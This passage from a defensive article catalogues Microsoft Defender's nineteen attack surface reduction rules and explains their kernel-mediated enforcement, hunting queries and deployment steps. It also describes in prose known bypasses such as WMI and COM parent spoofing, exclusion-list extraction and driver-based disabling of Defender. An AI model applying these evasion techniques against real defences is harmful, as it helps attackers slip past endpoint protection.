Block use of copied or impersonated system tools -- c0033c00-d16d-4114-a5a0-dc9b3a7d2ceb -- the rename-and-relocate evasion response (attackers copying cmd.exe to a writable path and renaming it update.exe).
Block untrusted and unsigned processes that run from USB -- b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 -- the BadUSB / removable-media response.
Block Office communication application from creating child processes -- 26190899-1602-49e8-8b27-eb1d0a1ce869 -- the Outlook variant of the Office-child-process rule.

The three ASR rules Microsoft classifies as safe to enable in Block mode without staged rollout: Block abuse of exploited vulnerable signed drivers, Block credential stealing from the Windows local security authority subsystem, and Block persistence through WMI event subscription. The classification appears verbatim on the ASR rules overview page [@ms-learn-asr-overview]. The LSASS rule is redundant when LSA Protection is enabled; the WMI persistence rule still requires Audit testing if Microsoft Configuration Manager manages the device.

The catalogue stands at 19 rules as of May 2026 -- three Standard protection rules and sixteen Other ASR rules, the count inclusive of the server-only Webshell rule that does not emit DeviceEvents [@ms-learn-asr-reference]. The pattern is consistent enough that the next section gives it a name.

5. Edges, Not Nodes

The structural pivot the whole article rests on can be written in one sentence: signatures classify nodes; AppLocker classifies identities; ASR classifies edges in the runtime graph. The rest of this section unpacks what that means and why it matters.

A node in the runtime graph is a binary or a file -- the kind of thing static analysis can fingerprint. An edge is a runtime relationship between two nodes: process A creating process B, process A writing file F, process A opening a handle to LSASS memory, the WMI repository writing a new __FilterToConsumerBinding. Signatures answer "is this node bad?" -- undecidable in general per Cohen 1984 [@cohen-1984-part1]. AppLocker answers "is this node's identity on the allow-list?" -- decidable but blind to LOLBin chains [@lolbas-project]. ASR answers "did this specific edge happen?" -- decidable per event at the OS interception layer.

The Cohen sidestep is precise. Cohen 1984 proved that classifying nodes ("is this program malicious?") is undecidable in general, via a reduction to the Halting Problem. He did not prove that classifying runtime edges is undecidable, because "did this specific parent-child invocation just happen?" is an observable proposition. The kernel sees the system call. The decision is local. No static analysis is required. ASR is the canonical industrial instantiation of that insight; every generation in Section 4 is a catalogue extension within the edge-classification approach, not a structural reframing of it.

Key idea: Signatures classify nodes. AppLocker classifies identities. ASR classifies edges in the runtime graph. By moving from node classification to edge classification, Microsoft sidesteps Cohen-1984 undecidability in the practical sense: you do not need to decide whether the binary is malicious, only whether the edge happened. The kernel sees the edge.

Where does the enforcement actually live? The "kernel-mediated" framing earns its phrasing in three precise pieces.

First, WdFilter.sys is the Microsoft Defender Antivirus minifilter driver.An altitude, in Windows Filter Manager terminology, is a 32-bit decimal that determines the order in which file-system minifilters see I/O. Higher altitudes see I/O first on the way down to the file system and last on the way back up. Anti-virus drivers live in the 320000-329998 band. It is registered with the Windows Filter Manager in the FSFilter Anti-Virus altitude band (320000-329998), specifically at altitude 328010 per Microsoft's IFS allocated-altitudes reference [@ms-learn-ifs-allocated-altitudes]. It runs in kernel mode and intercepts process-creation, image-load, file-write, and (for some rules) WMI and registry edges through Filter Manager pre-operation callbacks and process / image-load notify routines.

The Microsoft Defender Antivirus minifilter driver. Registered with the Windows Filter Manager at altitude 328010 in the FSFilter Anti-Virus band (320000-329998) per Microsoft's allocated-altitudes reference [@ms-learn-ifs-allocated-altitudes]. It runs in kernel mode and hosts the interception callbacks that ASR uses to see process-creation, image-load, and file-write edges before the user-mode actor completes the operation.

Second, MsMpEng.exe is the Defender Antivirus service process. It runs in user mode at integrity level System. For every intercepted edge it consults the per-rule predicate, the per-rule exclusion list, and (for cloud-protected rules) the Microsoft Active Protection Service reputation, then returns Audit, Warn, or Block. The kernel/user-mode split is structural, not accidental. Interception must happen in the kernel before the user-mode actor completes the call. But exclusion-list lookup and cloud reputation are not appropriate inside a minifilter that holds the IRP open.

The Microsoft Defender Antivirus service process. Runs in user mode at integrity level System and hosts the policy-evaluation engine that decides Audit, Warn, or Block for every edge intercepted by `WdFilter.sys`. The two together form the kernel-mediated, user-mode-evaluated enforcement architecture that ASR relies on.

Third, telemetry. ASR blocks land in Defender for Endpoint's DeviceEvents Advanced Hunting table with a rule-specific ActionType such as AsrOfficeChildProcessBlocked or AsrLsassCredentialTheftBlocked. The rules reference enumerates a paired Audited and Blocked ActionType for every rule except the Webshell rule, which is the only one without a DeviceEvents row [@ms-learn-asr-reference]. The universal hunting query is DeviceEvents | where ActionType startswith "Asr". The generic AsrRuleTriggered is folk wisdom; it has never existed.

Microsoft Defender for Endpoint's Kusto Query Language (KQL) surface over endpoint telemetry. ASR blocks and audit events land in the `DeviceEvents` table with rule-specific `ActionType` values. Defenders combine `DeviceEvents` with `DeviceProcessEvents`, `DeviceFileEvents`, and `DeviceImageLoadEvents` to assemble the corroborating edge data around any ASR row [@ms-learn-asr-reference]. flowchart LR P["User-mode process
WINWORD.EXE"] -->|"CreateProcessW"| K["Windows kernel
process-creation notify"] K --> WD["WdFilter.sys
kernel-mode minifilter
altitude 328010"] WD -->|"edge event"| MP["MsMpEng.exe
user-mode service
rule predicate + exclusions + MAPS"] MP -->|"Audit / Warn / Block"| WD WD -->|"fail or allow CreateProcessW"| P MP -->|"telemetry"| DE["DeviceEvents
ActionType = AsrOfficeChildProcessBlocked"] A common misconception is "ASR runs in the kernel." That is partially true and structurally incomplete. The interception point is kernel-mode; the policy evaluation is user-mode. Both are necessary. The kernel must see the edge before the user-mode actor completes the operation, but the cloud reputation lookup and the per-rule exclusion list are not appropriate to run inside a minifilter that holds the IRP open. The correct one-line framing is "kernel-mediated interception, user-mode policy evaluation."

The marginal performance cost of an ASR check is bounded by the existing WdFilter.sys callout that already runs for real-time scanning. ASR piggybacks on callouts the antivirus engine has already paid for. Microsoft has not published a number isolating ASR per-event overhead from broader minifilter cost; the IFS allocated-altitudes page is the closest published reference [@ms-learn-ifs-allocated-altitudes]. The sub-microsecond-per-event framing is INFERRED from the architecture, not measured.

"Protection from denial of services requires the detection of halting programs which is well known to be undecidable." -- Fred Cohen, "Computer Viruses: Theory and Experiments," 1984 [@cohen-1984-part1]

The framework now in place is "name a behaviour class, ship an enforcement edge." Nine years and seven generations of catalogue extension have followed that single rule. So what does the catalogue look like in detail today? The next section is the reference table: nineteen rules, organised by category, with GUID, ActionType, and the attacker behaviour each one closes.

6. The Nineteen Rules in Detail

This section is the article's reference table. Not a deployment guide (that comes in Section 10), but a catalogue to return to when you need to remember which GUID maps to which behaviour and which ActionType lands in DeviceEvents. Every row is from Microsoft Learn's rules reference page [@ms-learn-asr-reference].

Standard protection rules (3 rules)

Microsoft itself recommends enabling these three in Block mode without staged rollout, because their false-positive floor is low [@ms-learn-asr-overview].

Short name	GUID	ActionType (Blocked)	Notes
Block abuse of exploited vulnerable signed drivers	`56a863a9-875e-4185-98a7-b882c64b5ce5`	`AsrVulnerableSignedDriverBlocked`	The BYOVD response; pairs with the kernel-load-time Vulnerable Driver Blocklist [@ms-learn-driver-block-rules]
Block credential stealing from the Windows local security authority subsystem	`9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2`	`AsrLsassCredentialTheftBlocked`	Redundant when LSA Protection is enabled [@ms-learn-asr-overview]
Block persistence through WMI event subscription	`e6db77e5-3df2-4cf1-b95a-636979351e5b`	`AsrPersistenceThroughWmiBlocked`	Still requires Audit testing if Configuration Manager manages the device

Productivity apps (6 rules)

The Office and Adobe response pack, anchored by the Office-child-process rule that opens this article.

Short name	GUID	ActionType (Blocked)	Notes
Block all Office applications from creating child processes	`d4f940ab-401b-4efc-aadc-ad5f3c50688a`	`AsrOfficeChildProcessBlocked`	The macro-to-PowerShell stopper
Block Office applications from creating executable content	`3b576869-a4ec-4529-8536-b80a7769e899`	`AsrExecutableOfficeContentBlocked`	Blocks dropped EXEs from Office processes
Block Office applications from injecting code into other processes	`75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84`	`AsrOfficeProcessInjectionBlocked`	No Warn-mode support [@ms-learn-asr-overview]
Block Win32 API calls from Office macros	`92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b`	`AsrOfficeMacroWin32ApiCallsBlocked`	Refuses `Declare` statements that bind to native DLLs
Block Office communication application from creating child processes	`26190899-1602-49e8-8b27-eb1d0a1ce869`	`AsrOfficeCommAppChildProcessBlocked`	The Outlook variant
Block Adobe Reader from creating child processes	`7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c`	`AsrAdobeReaderChildProcessBlocked`	The PDF response

Scripts and email (3 rules)

The AMSI-backed script-content rules plus the email-drop-execution rule.

Short name	GUID	ActionType (Blocked)	Notes
Block execution of potentially obfuscated scripts	`5beb7efe-fd9a-4556-801d-275e5ffc04cc`	`AsrObfuscatedScriptBlocked`	AMSI-backed
Block JavaScript or VBScript from launching downloaded executable content	`d3e037e1-3eb8-44c8-a917-57927947596d`	`AsrScriptExecutableDownloadBlocked`	The drive-by-download response
Block executable content from email client and webmail	`be9ba2d9-53ea-4cdc-84e5-9b1eeee46550`	`AsrExecutableEmailContentBlocked`	Catches the dropped-attachment-run pattern

Lateral movement and prevalence (4 rules)

The cloud-protected, prevalence-based rules plus the Emotet lateral-movement responses.

Short name	GUID	ActionType (Blocked)	Notes
Block process creations originating from PSExec and WMI commands	`d1e49aac-8f56-4280-b9ba-993a6d77406c`	`AsrPsexecWmiChildProcessBlocked`	Conflicts with Configuration Manager [@ms-learn-asr-overview]
Block executable files from running unless they meet a prevalence, age, or trusted list criterion	`01443614-cd74-433a-b99e-2ecdc07bfc25`	`AsrUntrustedExecutableBlocked`	Requires cloud protection (MAPS)
Block untrusted and unsigned processes that run from USB	`b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4`	`AsrUntrustedUsbProcessBlocked`	The BadUSB response
Use advanced protection against ransomware	`c1db55ab-c21a-4637-bb3f-a12568109d35`	`AsrRansomwareBlocked`	Requires cloud protection

Server, system-tool, and safe-mode (3 rules)

The post-2022 additions.

Short name	GUID	ActionType (Blocked)	Notes
Block Webshell creation for Servers	`a8f5898e-1dc8-49a9-9878-85004b8a61e6`	(no DeviceEvents pair)	Only rule without a `DeviceEvents` ActionType [@ms-learn-asr-reference]
Block rebooting machine in Safe Mode	`33ddedf1-c6e0-47cb-833e-de6133960387`	`AsrSafeModeRebootBlocked`	Also emits `AsrSafeModeRebootWarnBypassed` -- proof Warn is supported
Block use of copied or impersonated system tools	`c0033c00-d16d-4114-a5a0-dc9b3a7d2ceb`	`AsrAbusedSystemToolBlocked`	Also emits `AsrAbusedSystemToolWarnBypassed` -- proof Warn is supported

Total: 19 rules. Older blog posts that cite "16 rules" or "17 rules" reflect a 2021-2023 snapshot of the catalogue before the Safe Mode, copied-tools, USB, and Outlook variants landed.

The per-rule MITRE crosswalk

MITRE ATT&CK's Behavior Prevention on Endpoint mitigation (M1040) nominates ASR rules by name for several technique families. The first eight rows below are verbatim nominations from the M1040 page; the last two (T1505.003 and T1562.009) are this article's own mappings from rule semantics to the most-natural MITRE technique, because M1040 itself does not enumerate the Webshell or Safe Mode Boot techniques [@mitre-m1040]:

MITRE technique	ASR rule that covers it
T1059.005 / T1059.007 (Command and Scripting Interpreter: Visual Basic / JavaScript)	Block JavaScript or VBScript from launching downloaded executable content; Block execution of potentially obfuscated scripts
T1543 / T1543.003 (Create or Modify System Process / Windows Service)	Block abuse of exploited vulnerable signed drivers
T1486 (Data Encrypted for Impact)	Use advanced protection against ransomware
T1546.003 (Event Triggered Execution: WMI Event Subscription)	Block persistence through WMI event subscription
T1559 / T1559.002 (Inter-Process Communication: Dynamic Data Exchange)	Block all Office applications from creating child processes
T1106 (Native API)	Block Win32 API calls from Office macros
T1027 / T1027.009 / T1027.010 (Obfuscated Files or Information)	Block execution of potentially obfuscated scripts
T1003.001 (LSASS Memory)	Block credential stealing from the Windows local security authority subsystem
T1505.003 (Server Software Component: Web Shell) -- author mapping, not M1040-nominated	Block Webshell creation for Servers
T1562.009 (Impair Defenses: Safe Mode Boot) -- author mapping, not M1040-nominated	Block rebooting machine in Safe Mode

The crosswalk gives a defender the per-technique coverage map without leaving the article.

Note: Recall from Section 1: every rule emits a rule-specific Asr<RuleName>Audited and Asr<RuleName>Blocked pair (the Webshell rule excepted), and the canonical universal Advanced Hunting filter is where ActionType startswith "Asr" [@ms-learn-asr-reference].

The Webshell rule's missing DeviceEvents ActionType is the most visible gap in the catalogue's telemetry surface. Defenders typically use Sysmon Event ID 11 (FileCreate) in web roots and IIS access logs to corroborate blocked webshell creations on servers; the Microsoft Learn rules reference is explicit that the EDR-alerts column for this rule is "N" [@ms-learn-asr-reference].

The universal Advanced Hunting query, demonstrated below in a runnable JavaScript shape so a reader can verify the aggregation logic without a Defender for Endpoint tenant, is the single most useful starting point for any ASR investigation.

{` // Mocked DeviceEvents rows. Replace with output of: // DeviceEvents | where ActionType startswith "Asr" // | summarize count() by ActionType, DeviceName | order by count_ desc const deviceEvents = [ { DeviceName: "WS-FIN-042", ActionType: "AsrOfficeChildProcessBlocked" }, { DeviceName: "WS-FIN-042", ActionType: "AsrOfficeChildProcessBlocked" }, { DeviceName: "WS-FIN-118", ActionType: "AsrOfficeChildProcessAudited" }, { DeviceName: "WS-ENG-003", ActionType: "AsrLsassCredentialTheftBlocked" }, { DeviceName: "WS-FIN-042", ActionType: "AsrPsexecWmiChildProcessAudited" }, { DeviceName: "WS-FIN-118", ActionType: "AsrVulnerableSignedDriverBlocked" }, { DeviceName: "OTHER", ActionType: "DeviceLogon" }, // filtered out ];

const asrRows = deviceEvents.filter(r => r.ActionType.startsWith("Asr"));

const counts = asrRows.reduce((m, r) => { const key = r.ActionType + " | " + r.DeviceName; m[key] = (m[key] || 0) + 1; return m; }, {});

Object.entries(counts) .sort((a, b) => b[1] - a[1]) .forEach(([key, n]) => console.log(n + "\t" + key)); `}

Nineteen rules. Three categories. One catalogue that has grown by twelve rules in nine years and shows no sign of stopping. But ASR is not the only behaviour-blocking layer on the Windows endpoint. How does the catalogue compare to CrowdStrike's Indicators of Attack, SentinelOne's Storyline, App Control for Business, Sysmon, and the rest?

7. Where ASR Sits Among the Behaviour Layers

ASR is one of seven currently-deployed methods for behavioural defence on the Windows endpoint. None of them obsoletes any of the others; they layer. Counting the strengths honestly means counting the weaknesses too.

App Control for Business, AppLocker, WDAC

Identity classification. App Control for Business and its predecessor AppLocker are stricter than ASR on the identity axis (default-deny when tuned) but blind to behaviour edges among allowed binaries [@ms-learn-applocker]. The Vulnerable Driver Blocklist that ships default-on with Windows 11 22H2 is the kernel-load-time sibling to ASR's BYOVD rule and works against the same class of attack from the kernel side rather than the user side [@ms-learn-driver-block-rules]. App Control and ASR are complementary, not competing.

CrowdStrike Falcon Behavioral Indicators of Attack

Cloud-evaluated edge classifier. CrowdStrike's own one-line definition of IOAs is the cleanest a vendor has published [@crowdstrike-ioa-definition]: "telltale signs or activities that signal a potential cybersecurity threat or attack is in progress. ... They aim to identify and mitigate a threat before it can fully materialize." The trade-offs cut both ways. CrowdStrike pushes new IOA rules from the cloud without an OS update -- real adaptivity. The cost: no public reference catalogue (every IOA is vendor-internal), a cloud dependency for some configurations, and a commercial licence. ASR is free; CrowdStrike is not.

SentinelOne Singularity Storyline, ActiveEDR

On-agent behavioural-AI engine with per-host storyline graph correlation and a STAR custom-rule layer. SentinelOne's product-level marketing pages return JavaScript-rendered shells or HTTP 404s to text-only fetchers, so byte-precision verification for specific features is currently unavailable. The model-level description (on-agent graph correlation that works offline) is well-attested in the secondary literature. The trade-offs mirror CrowdStrike's: vendor-internal classifier, no public catalogue, commercial licence. This article keeps the framing at the model level and avoids specific feature or performance claims.

Note: The SentinelOne canonical product URLs are HTTP 404 or JavaScript-rendered shells with no byte-extractable text. The model-level claim (on-agent behavioural-AI graph correlation, STAR custom-rule layer, designed offline) is well-attested in the secondary literature; no specific feature claim has a single byte-verified URL behind it in this iteration.

Microsoft 365 Apps internet-macro default block

The Office-internal parallel layer that ended the macro era for unmanaged tenants [@ms-learn-internet-macros-blocked] [@ms-techcommunity-internet-macros-2022]. Office-only and macro-only; covers neither DDE, OLE, embedded executables, nor non-VBA Office attack chains. ASR remains the layer that catches the corresponding edge if the macro layer is bypassed by a managed-tenant override or by a non-macro initial-access vector.

Sysmon and custom SIEM rules

High-fidelity edge visibility; no enforcement. Practitioners run Sysmon alongside ASR for audit-trail coverage of edges ASR does not block and for corroborating telemetry around edges it does. Note that MITRE M1042 ("Disable or Remove Feature or Program") does not mention Sysmon or ASR by name [@mitre-m1042]; the Sysmon-with-ASR pairing is practitioner consensus rather than an M1042 nomination. M1040 (Behavior Prevention on Endpoint) is the mitigation that names ASR rules verbatim [@mitre-m1040].

EDR-in-block-mode

The sibling post-event automated-response layer to ASR, not an umbrella over it. EDR-in-block-mode is required for passive-AV configurations where Defender Antivirus is not the primary. Microsoft Learn's EDR-in-block-mode page is unambiguous about the dependency: "Features like network protection and attack surface reduction (ASR) rules and indicators ... are only available when Microsoft Defender Antivirus is running in Active mode" [@ms-learn-edr-in-block-mode]. EDR-in-block-mode acts strictly post-event on EDR detections; ASR acts pre-completion on the operation itself. Different points in the timeline.

A common misframing places EDR-in-block-mode as the umbrella feature that "covers" ASR. The Microsoft Learn page contradicts that reading directly. EDR-in-block-mode is the layer that lets Defender for Endpoint block based on its EDR findings even when a third-party AV is primary; ASR is the layer that intercepts the operation at the minifilter before any other component sees it. They are siblings, not parent and child [@ms-learn-edr-in-block-mode].

The comparison matrix

The seven methods on ten axes. Read this as a trade-off space; no row dominates the others on every axis.

Method	Classification axis	Enforcement substrate	Catalogue inspectability	Cost	Cloud-connectivity required	OS coverage	Best suited for
ASR rules	Edge	Kernel-mode minifilter + user-mode service	Fully public per-rule [@ms-learn-asr-reference]	Free with Windows	No (some rules require MAPS)	Windows 10 1709+, Windows 11, Windows Server	Behaviour-edge defence; macro chains; LSASS; BYOVD
M365 Apps internet-macro block	Document-trust	Office process	Public docs [@ms-learn-internet-macros-blocked]	Free with M365	No	Microsoft 365 Apps	Internet-marked Office macros
App Control + Vulnerable Driver Blocklist	Identity + driver hash	Kernel	Public policy XML / Block rules [@ms-learn-driver-block-rules]	Free with Windows	No	Windows 10+, Server	Default-deny; kernel-load-time BYOVD
CrowdStrike Falcon IOAs	Edge	Agent + cloud	Vendor-internal [@crowdstrike-ioa-definition]	Commercial	Yes (some)	Cross-platform	Adaptive cloud-pushed behavioural detection
SentinelOne Storyline	Edge graph	On-agent	Vendor-internal	Commercial	No (designed offline)	Cross-platform	Per-host graph correlation
Sysmon + SIEM	Visibility only	User-mode (Sysmon) + SIEM	Public events; SIEM rules per-tenant	Sysmon free; SIEM commercial	Yes (SIEM)	Windows 7+, Linux	Audit trail; corroboration
EDR-in-block-mode	Post-detection block	MDE service	MDE-managed	Defender for Endpoint licence	Yes	Windows 10+, Server	Passive-AV configurations

AV-Comparatives' Endpoint Prevention and Response Test 2023 evaluated 12 EPR products against 50 multi-stage targeted-attack scenarios across three phases -- Endpoint Compromise and Foothold, Internal Propagation, Asset Breach -- over June through September 2023 [@av-comparatives-epr-2023]. Per-product scoring is paywalled and is not reproduced here; only the methodology is cited as the cross-vendor backdrop against which any "ASR vs the rest" empirical claim has to be measured. The article makes no specific scoring claim against AV-Comparatives data because the scoring is not publicly extractable from the free summary.

Each row in the matrix names a different trade-off. ASR is the only row that is free, kernel-mediated, fully inspectable, and shipped with every Windows edition that includes Defender Antivirus. But the catalogue is finite. And the attacker's degrees of freedom are not. What does the theory say about the gap?

8. What No Behaviour Block List Can Do

Every defence layer has a lower bound. ASR's is Cohen 1984 -- but indirectly, through the structural floor that every edge predicate inherits.

Cohen's 1984 result (introduced in Section 3 as a Definition with its diagonal-construction proof sketch and Rice-1953 corollary) proves that detection of arbitrary viral behaviour in a program reduces to the Halting Problem and is therefore undecidable in general [@cohen-1984-part1]. ASR sidesteps the result by changing the question. Not "is this program malicious?" -- undecidable in general -- but "did this specific edge in the runtime graph just occur?" -- decidable per event at the OS interception layer. The Cohen ceiling does not directly forbid edge classification; it forbids node classification. Edge classification is decidable per edge.

The cost is two structural floors that any behaviour-block list inherits.

The over-approximation floor. Every edge predicate is itself an over-approximation of "is this edge malicious." Legitimate IT-automation Word macros do legitimately spawn PowerShell. Legitimate backup software does legitimately read LSASS memory (WerFaultSecure.exe appears on extracted LSASS-rule exclusion lists per Adam Svoboda's VDM-extraction technique [@adamsvoboda-asr-exclusions]). Legitimate management software does legitimately write driver files. Every ASR rule therefore has a structural false-positive floor; the per-rule exclusion list is the recovery mechanism. Exclusion lists trade safety for compatibility.

The catalogue-finiteness upper bound. The space of possible attack edges is countably infinite. Any composition of CreateProcess, WriteFile, RegSetValue, WMI subscription, scheduled task, COM IDispatch::Invoke, or driver-load can be chained into a new edge sequence. The catalogue is finite -- nineteen rules in May 2026 [@ms-learn-asr-reference]. The bound is sharp: an attacker whose chain crosses any edge e in the catalogue is detected at e; an attacker whose chain avoids every edge in the catalogue is not.

Key idea: ASR compresses bypass cost; it does not eliminate it. The catalogue is finite. The attacker's space of edges is countably infinite. Behaviour-block lists are incomplete by construction -- and that is not a defect; it is the design philosophy. The defender's job is not to fix the incompleteness but to make every cheap attack chain expensive enough that the attacker stops using it.

The empirical evidence for the catalogue-finiteness bound is the bypass-research cluster. SANS ISC Diary 27036 (Daniel Wesemann, January 27, 2021) documents the WMI-grandparent bypass to the Office-child-process rule [@sans-isc-27036-emotet-asr]. Sevagas / Emeric Nasi's "Bypass Windows Defender Attack Surface Reduction" PDF (2021) documents COM-object-indirection bypasses [@sevagas-asr-bypass]. Primusinterp's "Cheesing Microsoft Attack Surface Reduction rules" enumerates chained-COM bypasses against the 2017-era catalogue [@primusinterp-cheesing-asr]. Adam Svoboda's VDM-extraction technique enumerates the exclusion lists themselves [@adamsvoboda-asr-exclusions]. None of these is a defect Microsoft has been slow to fix. All are structural consequences of the catalogue-finiteness bound.

The proof in Cohen's open-access archive reduces virus detection to the Halting Problem; the 1984 DoD/NBS conference paper is the original presentation; the 1987 *Computers and Security* reprint is the canonical citable journal form. The open-access archive at all.net is the byte-verifiable text; the verbatim sentence "Protection from denial of services requires the detection of halting programs which is well known to be undecidable" is on the first page of Part 1 [@cohen-1984-part1]. The line is the closest one-sentence statement of the structural ceiling that any node-classifying malware detector inherits.

ASR's design philosophy is not to achieve the theoretical optimum of "complete, sound, real-time, false-positive-free edge catalogue" (unachievable for the reasons above). It is to compress the attacker's bypass cost -- to force the attacker off the cheap, common attack chains (WINWORD -> cmd -> PowerShell) onto more expensive ones (WMI grandparent, COM indirection, scheduled-task fan-out, exclusion-list enumeration, BYOVD). The Section 11 FAQ entry that picks up this thread makes it explicit.

A finite catalogue, an unbounded attacker space, and a structural floor under each rule. The next section names the open problems that follow.

9. What Is Still Moving

The bypass-research corpus around ASR is not a temporary embarrassment. It is the permanent shape of every catalogue-based defence. Six open problems define the layer's research frontier as of May 2026.

Problem 1 -- The WMI and COM grandparent bypass class

The canonical bypass is documented in SANS Internet Storm Center Diary 27036, published January 27, 2021 by handler Daniel Wesemann [@sans-isc-27036-emotet-asr]. Emotet's VBA invoked Win32_Process.Create via WMI, so WmiPrvSE.exe became the literal parent of cmd.exe; the Office-child-process rule's predicate is byte-literal (it checks the immediate parent image against the Office binary list) and therefore never fires.

sequenceDiagram participant VBA as VBA macro in WINWORD.EXE participant WMI as WmiPrvSE.exe (svchost host) participant CMD as cmd.exe participant WD as WdFilter.sys participant MP as MsMpEng.exe VBA->>WMI: GetObject winmgmts, Win32_Process.Create WMI->>WD: process-create notify, parent = WmiPrvSE WD->>MP: edge event, parent image WmiPrvSE.exe MP-->>WD: rule D4F940AB predicate false, no Office parent WD-->>WMI: allow CreateProcess WMI->>CMD: spawn cmd.exe 'cmd' is not a child process of Word, and the ASR block rule to prevent child processes of Word consequently doesn't trigger. -- Daniel Wesemann, SANS ISC Diary 27036, January 27, 2021 [@sans-isc-27036-emotet-asr]

The PSExec/WMI rule (d1e49aac-...) was added in Windows 10 1803 to catch the most common variant, but Microsoft Learn warns that it conflicts with Configuration Manager [@ms-learn-asr-overview]. COM-object indirection (MMC.Application, Outlook.Application, ShellWindows) generalises the bypass beyond WMI [@sevagas-asr-bypass] [@primusinterp-cheesing-asr]. No ASR rule today covers transitive-parent classification across COM or scheduled-task fan-out without breaking Configuration Manager dependencies. The open question is whether a transitive-parent predicate can be added without breaking SCCM, and what false-positive rate that costs.

Problem 2 -- Event 5007 and exclusion-list enumeration

Adam Svoboda's technique demonstrates that ASR exclusion lists live in Defender VDM containers (mpasbase.vdm, mpasdlta.vdm) and are extractable with wdextract64.exe [@adamsvoboda-asr-exclusions]. A low-privilege user with read access to C:\ProgramData\Microsoft\Windows Defender\Definition Updates\ can enumerate the whitelisted paths the LSASS rule, the BYOVD rule, and other rules carry by default. Tamper Protection prevents runtime modification of the exclusion list but does not prevent read access [@ms-learn-tamper-protection]. Once the exclusion list is enumerated, the per-rule defence becomes "did the attacker drop the payload in a writable whitelisted path?" -- a deployment-quality question, not a structural one. The open problem is whether the exclusion lists should be encrypted at rest with a key not derivable by an unprivileged process.

Problem 3 -- Catalogue completeness against modern initial-access vectors

Emotet's post-2022 pivot to OneNote embedded scripts, HTML smuggling, ISO and IMG containers (which strip MOTW on extraction), LNK files, and 7z archives is not covered by ASR's existing rules [@welivesecurity-emotet-pivot-2022]. SmartScreen, Network Protection, and the Microsoft 365 Apps internet-macro default block cover some of this surface, but not via ASR's edge-predicate model. The open question is whether the ASR catalogue should grow to cover OneNote-spawns-child, or whether the right answer is to rely on the parallel layers and accept that ASR's coverage of OneNote-era initial-access is partial.

Problem 4 -- The Webshell rule's missing telemetry surface

Per the Microsoft Learn rules reference, "Block Webshell creation for Servers" (a8f5898e-...) is the only rule without a DeviceEvents ActionType pair [@ms-learn-asr-reference]. Defenders cannot KQL-hunt for blocked Webshell creations the way they can for every other rule; visibility lives in MpCmdRun.log and IIS access logs. The open question is when Microsoft will add the missing ActionType so that the Webshell rule's audit-and-block events become uniformly queryable in Advanced Hunting.

Problem 5 -- Tamper Protection versus kernel-level attackers

ASR is enforced by WdFilter.sys running at integrity level System, but a kernel-mode attacker (for example, one with a BYOVD-loaded malicious driver) is a peer. BlackByte's 2022 BYOVD campaigns demonstrated the pattern: load a vulnerable signed driver, disable Defender's notify routines, proceed [@sophos-blackbyte-returns-2022]. The ASR BYOVD rule (56a863a9-...) plus the WDAC Vulnerable Driver Blocklist default-on in Windows 11 22H2 [@ms-learn-driver-block-rules] plus Hypervisor-protected Code Integrity each close a sub-class. None closes the full class, because the driver-block-list is update-cadence-bounded. The open question is whether WdFilter.sys can be moved into a Virtualization-Based Security isolated enclave such that even a kernel-compromise primitive cannot tamper with ASR enforcement.

Problem 6 -- The inspectability dual

ASR's structural floor is catalogue finiteness. The structural floor of its SOTA competitors (CrowdStrike AI-powered IOAs, SentinelOne Storyline) is vendor-internal inspectability. When an AI-powered IOA fires, the defender has no rule GUID to look up, no published predicate to reason about, no per-edge auditability for purple-team coverage assessment. The two bounds are complementary: ASR optimises for inspectability at the cost of catalogue-growth lag; the AI-powered competitors optimise for adaptive classifier coverage at the cost of inspectability. A complete edge-classification SOTA layer would combine both. No single product currently does.

Note: The Outflank ASR-bypass blog corpus is a well-known research-cluster member; live URLs returned HTTP 403 (Cloudflare) and Wayback Machine fallbacks were unreachable from the verification environment. Named honestly here without inventing a URL. The bypass cluster's claims are independently supported by SANS ISC [@sans-isc-27036-emotet-asr], Sevagas [@sevagas-asr-bypass], Primusinterp [@primusinterp-cheesing-asr], and Adam Svoboda [@adamsvoboda-asr-exclusions].

The catalogue is incomplete by construction. The defender's job is not to fix the incompleteness; it is to make every cheap attack chain too expensive to use. Section 10 codifies that into a Monday-morning playbook.

10. How to Actually Use This on Monday

Five steps. Source-control everything. Treat ASR not as a replacement for AppLocker, App Control for Business, or your EDR -- treat it as a kernel-mediated, free, behaviour-edge layer that costs almost nothing once tuned.

Step 1 -- Enable the three Standard protection rules in Block mode first

Microsoft itself classifies these three as low-false-positive-floor [@ms-learn-asr-overview]:

Block abuse of exploited vulnerable signed drivers (Device) -- 56a863a9-875e-4185-98a7-b882c64b5ce5.
Block credential stealing from the Windows local security authority subsystem -- 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2. Note: if LSA Protection is enabled on the device (recommended together with Credential Guard), Microsoft Learn states verbatim that "this rule is redundant" and Defender will show the rule as "not applicable" [@ms-learn-asr-overview].
Block persistence through WMI event subscription -- e6db77e5-3df2-4cf1-b95a-636979351e5b. Even though this rule is in the Standard set, Microsoft Learn recommends extensive Audit-mode testing if Configuration Manager manages the device, "because the Configuration Manager client relies heavily on WMI" [@ms-learn-asr-overview].

Step 2 -- Move the other sixteen rules through Audit, Warn, Block

The canonical deployment ladder is enumerated in the implementation guide on Microsoft Learn: start every rule in Audit, watch DeviceEvents for false positives, transition to Warn (or Block where Warn is unsupported), then transition to Block once the false-positive rate is acceptable in your first deployment ring [@ms-learn-asr-deployment-implement]. Two rules skip Warn entirely and go Audit straight to Block: Block credential stealing from LSASS and Block Office applications from injecting code into other processes [@ms-learn-asr-overview]. The other fourteen Other ASR rules support the full three-step ladder.

Step 3 -- Hunt with the universal query

DeviceEvents | where ActionType startswith "Asr" returns every Audit and Block emission across the fleet. Pair with DeviceProcessEvents and DeviceFileEvents for the corroborating edge data; the Section 6 RunnableCode block demonstrates the shape. For the one rule without a DeviceEvents row -- Block Webshell creation for Servers -- use Sysmon Event ID 11 in web roots plus IIS access logs [@ms-learn-asr-reference]. Microsoft Learn's operationalize page is the corresponding canonical reference for post-deployment monitoring practices [@ms-learn-asr-deployment-operationalize].

Step 4 -- Layer with the sibling controls

ASR alone is not a complete posture. The set of controls that compose with ASR includes:

Tamper Protection [@ms-learn-tamper-protection] -- prevents administrators (and attackers with admin rights) from disabling ASR rules at runtime through registry or service tampering.
